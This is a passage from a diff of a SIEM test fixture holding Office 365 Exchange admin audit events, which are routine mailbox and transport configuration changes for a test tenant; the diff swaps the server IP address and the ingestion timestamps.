(15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853028900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1211,12 +1211,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1259,7 +1259,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1271,8 +1271,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177605200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853035200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1292,12 +1292,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1327,7 +1327,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1339,8 +1339,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177608500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853041200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1360,12 +1360,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1396,7 +1396,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1408,8 +1408,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177611300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853046900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1429,12 +1429,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1465,7 +1465,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1477,8 +1477,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177614200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853052600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1498,12 +1498,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1533,7 +1533,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1545,8 +1545,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177617400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853058400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1566,12 +1566,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1602,7 +1602,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1614,8 +1614,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177620400Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853064100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1635,12 +1635,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1683,7 +1683,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1695,8 +1695,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177623100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853069800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1716,12 +1716,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1764,7 +1764,7 @@ }, "related": { "ip": 